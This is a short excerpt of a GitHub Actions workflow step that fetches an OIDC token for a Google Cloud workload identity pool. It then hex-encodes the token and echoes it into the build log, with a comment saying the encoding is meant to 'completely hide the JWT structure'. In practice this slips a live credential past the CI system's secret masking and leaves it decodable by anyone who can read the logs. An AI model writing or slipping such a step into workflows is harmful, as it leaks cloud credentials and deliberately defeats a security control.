- name: Get OIDC token
        run: |
          TOKEN=$(curl -s -H "Authorization: bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN" \
            "$ACTIONS_ID_TOKEN_REQUEST_URL&audience=//iam.googleapis.com/projects/1091617576831/locations/global/workloadIdentityPools/test-pool/providers/test-provider" \
            | jq -r '.value')
          
          # Convert to Hex to completely hide the JWT structure
          echo "HEX_TOKEN=$(echo -n $TOKEN | xxd -p | tr -d '\n')"
